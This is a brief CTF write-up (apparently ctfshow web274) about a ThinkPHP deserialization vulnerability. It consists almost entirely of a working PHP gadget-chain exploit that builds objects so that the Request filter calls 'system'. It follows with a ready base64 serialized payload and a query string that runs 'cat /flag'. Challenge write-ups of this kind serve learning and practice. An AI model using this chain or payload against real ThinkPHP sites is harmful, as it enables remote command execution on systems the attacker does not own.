web274

thinkphp框架序列化漏洞
EXP

<?php 
namespace think;
abstract class Model{
    protected $append=[];
    private $data=[];
    function __construct(){
        $this->append=["lin"=>["ctf","show"]];
        $this->data=["lin"=>new Request()];
    }
}
class Request {
    protected $hook=[];
    protected $filter="system";
    protected $config=['var_ajax'=>'_ajax'];
    function __construct(){
        $this->filter="system";
        $this->config=['var_ajax'=>'lin'];
        $this->hook=["visible"=>[$this,"isAjax"]];
    }
}
namespace think\process\pipes;
use think\model\concern\Conversion;
use think\model\Pivot;
class Windows{
    private $files=[];
    public function __construct(){
        $this->files=[new Pivot()];
    }
}
namespace think\model;
use think\Model;
class Pivot extends Model{}
use think\process\pipes\Windows;
echo base64_encode(serialize(new Windows()));
?>

?data=TzoyNzoidGhpbmtccHJvY2Vzc1xwaXBlc1xXaW5kb3dzIjoxOntzOjM0OiIAdGhpbmtccHJvY2Vzc1xwaXBlc1xXaW5kb3dzAGZpbGVzIjthOjE6e2k6MDtPOjE3OiJ0aGlua1xtb2RlbFxQaXZvdCI6Mjp7czo5OiIAKgBhcHBlbmQiO2E6MTp7czozOiJsaW4iO2E6Mjp7aTowO3M6MzoiY3RmIjtpOjE7czo0OiJzaG93Ijt9fXM6MTc6IgB0aGlua1xNb2RlbABkYXRhIjthOjE6e3M6MzoibGluIjtPOjEzOiJ0aGlua1xSZXF1ZXN0IjozOntzOjc6IgAqAGhvb2siO2E6MTp7czo3OiJ2aXNpYmxlIjthOjI6e2k6MDtyOjk7aToxO3M6NjoiaXNBamF4Ijt9fXM6OToiACoAZmlsdGVyIjtzOjY6InN5c3RlbSI7czo5OiIAKgBjb25maWciO2E6MTp7czo4OiJ2YXJfYWpheCI7czozOiJsaW4iO319fX19fQ==&lin=cat /flag